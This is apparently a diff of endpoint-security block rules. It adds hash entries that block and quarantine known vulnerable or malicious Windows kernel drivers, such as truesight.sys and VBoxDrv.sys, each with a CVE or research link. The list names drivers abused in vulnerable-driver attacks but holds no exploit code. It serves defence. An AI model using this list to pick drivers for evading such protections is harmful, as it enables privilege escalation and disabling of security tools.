+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609761Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fb81b5f8bf69637dbdf050181499088a67d24577587bc520de94b5ee8996240f",
+ "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7d3dc74e-e503-52ac-8159-4c787bb48319",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143272Z",
+ "creation_date": "2026-03-23T11:45:31.143274Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143280Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bff9f1531b378513d6385955fd17d213dbf896603d25a0609a5127b3a8010241",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7d43b8ed-1ee6-59d9-adb0-a138a7b736b5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979099Z",
+ "creation_date": "2026-03-23T11:45:29.979101Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979106Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fe14940b5d3068b7ceffd28a529196811f1d0e175522f4dfab26573e7aca0bb4",
+ "comment": "Vulnerable Kernel Driver (aka LHA.sys) [https://www.loldrivers.io/drivers/eb07ef7e-0402-48eb-8e06-8fb76eda5b84/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7d4c6820-c1ca-5492-b9be-e97cb506eee6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.147077Z",
+ "creation_date": "2026-03-23T11:45:32.147079Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.147084Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cf24c69123d4a72445547f7b5ad6738fb47f2d3fab06e3d628b7278113a63ae0",
+ "comment": "Vulnerable Kernel Driver (aka NSecKrnl.sys) [https://x.com/anylink20240604/status/1967181190949228608] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7d665525-3db8-5c64-aeb7-c5416ed48fe9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481994Z",
+ "creation_date": "2026-03-23T11:45:31.481998Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.482008Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0795d8e203efeb47f37bbea4b99010253c1f5ada10e7f5fc23557ae2cd03e528",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7d694239-05f9-558f-aa96-f72a3881a606",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143342Z",
+ "creation_date": "2026-03-23T11:45:31.143344Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143350Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4503df4f3d32a5029e7029d76ea60648959278efb0fdf7ad480955a40e1b4540",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7d7045e6-3bb5-56e5-84c8-c3793242b87d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619320Z",
+ "creation_date": "2026-03-23T11:45:29.619322Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619327Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "caa85c44eb511377ea7426ff10df00a701c07ffb384eef8287636a4bca0b53ab",
+ "comment": "Realtek vulnerable driver (aka rtkio64.sys, rtkiow10x64.sys and rtkiow8x64.sys) [https://github.com/blogresponder/Realtek-rtkio64-Windows-driver-privilege-escalation] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7d838449-d69d-56d0-a7e7-5ed798b4e617",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.822000Z",
+ "creation_date": "2026-03-23T11:45:30.822002Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822008Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e160fc9d1990bc1e7ffa556d6ada19db0d2c5c7aeb23a491704b37854a666480",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7d8b34c5-82a9-588f-bb50-5b30109c0c19",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.825819Z",
+ "creation_date": "2026-03-23T11:45:31.825821Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.825826Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "965ed1c794e002a00da89938e099bb53c0693cef8bc6530052ac61108c21900a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7dbd6a2f-e967-5da6-863d-41cdbe298369",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454298Z",
+ "creation_date": "2026-03-23T11:45:30.454302Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454311Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2a4f4400402cdc475d39389645ca825bb0e775c3ecb7c527e30c5be44e24af7d",
+ "comment": "Vulnerable Kernel Driver (aka kEvP64.sys) [https://www.loldrivers.io/drivers/fe2f68e1-e459-4802-9a9a-23bb3c2fd331/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7dc38898-5a40-51dc-9035-5ea6a62c5420",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978633Z",
+ "creation_date": "2026-03-23T11:45:29.978635Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978640Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "be54f7279e69fb7651f98e91d24069dbc7c4c67e65850e486622ccbdc44d9a57",
+ "comment": "Vulnerable Kernel Driver (aka magdrvamd64.sys) [https://www.loldrivers.io/drivers/cfd36b2e-cf96-498e-aeb6-ee20e7b33bbb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7dc8d590-c1a7-5b3b-9515-b608eccbc409",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616077Z",
+ "creation_date": "2026-03-23T11:45:29.616079Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616085Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "316a27e2bdb86222bc7c8af4e5472166b02aec7f3f526901ce939094e5861f6d",
+ "comment": "Phoenix Tech. vulnerable BIOS update tool (aka PhlashNT.sys and WinFlash64.sys) [https://www.loldrivers.io/drivers/be3e49ea-095e-4fdb-9529-f4c2dbb9a9fc/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7dcdb755-a0e3-5213-93bb-67ad3d6b84dd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608527Z",
+ "creation_date": "2026-03-23T11:45:29.608529Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608534Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c8940e2e9b069ec94f9f711150b313b437f8429f78d522810601b6ee8b52bada",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7ddadf89-ac9a-5f86-a52c-a16d9e02a4ed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817470Z",
+ "creation_date": "2026-03-23T11:45:30.817472Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817477Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5640179b9cffc3517d322ac2c0bc1258b563f65ebb1b67eb22ecf7f3a0500c7d",
+ "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7de1a559-ffe7-542b-a95f-d7ecc61b53f7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474993Z",
+ "creation_date": "2026-03-23T11:45:31.474997Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475008Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c3322c0acfc5059a56a43d3ba4aec5e50fd33e4cbecde61886870d35ca713770",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7de728fc-c055-52c3-a077-08a6352d0235",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494583Z",
+ "creation_date": "2026-03-23T11:45:31.494585Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494590Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "936cd8d5a9631f699f6ea47aee9bb2830f8e5d344a5cbc9a5406849f8c76590b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7ded9750-04c4-5131-a855-6e5f266b5654", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619072Z", + "creation_date": "2026-03-23T11:45:29.619074Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619079Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d510b3424178f80cbe926217d74bbecbf682a88f1b6052ef27fd27d601fc14f7", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7df869e0-2205-5e7c-ad6c-234f90b32ac3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.452569Z", + "creation_date": "2026-03-23T11:45:30.452572Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": 
true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.452580Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8922be14c657e603179f1dd94dc32de7c99d2268ac92d429c4fdda7396c32e50", + "comment": "Malicious Kernel Driver (aka 1fc7aeeff3ab19004d2e53eae8160ab1.sys) [https://www.loldrivers.io/drivers/aaf8ce1a-e11b-4929-96e0-5ec0666cef2c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7df95a3f-034d-5650-87d4-186b63cfa41f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823088Z", + "creation_date": "2026-03-23T11:45:31.823090Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823096Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f3bb5f551e507edc3acf10dc6256330d9346ba8507835d4d3c502a14910d36ea", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7e1ae96f-aadd-50c8-a0c3-250ab5d41ee0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498522Z", + "creation_date": "2026-03-23T11:45:31.498525Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498534Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "336fa6004c339b5febea9dac960d794a61c34fdcecf4df8674126e3fe7325020", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7e1e08a7-fb2b-5dba-a718-41b2ce4314a1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607508Z", + "creation_date": "2026-03-23T11:45:29.607510Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607515Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "13aa698c09a31d642d3e2a9dd03be2363b11b4024689fb6c97234719446dbbd7", + "comment": "Vulnerable Kernel Driver (aka PanIOx64.sys) [https://www.loldrivers.io/drivers/93c84c08-4683-493d-abf7-22dc2d1cb567/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7e1f2249-2ebd-523d-90a5-640892468946", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142910Z", + "creation_date": "2026-03-23T11:45:31.142912Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142917Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8f4cde6f97420602f31c1bc9aa72a57a46c27ebc37dd412f0aed74cc9e0d1e46", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7e288d1a-4c39-5197-9455-197035923ecb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616347Z", + "creation_date": "2026-03-23T11:45:29.616349Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616354Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "65c26276cadda7a36f8977d1d01120edb5c3418be2317d501761092d5f9916c9", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7e32d87e-1736-5624-b849-516bc7e81490", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975024Z", + "creation_date": 